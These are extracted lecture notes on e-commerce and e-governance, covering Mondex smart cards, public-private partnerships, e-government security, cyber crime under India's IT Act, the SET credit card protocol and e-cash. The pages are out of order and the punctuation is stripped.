university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
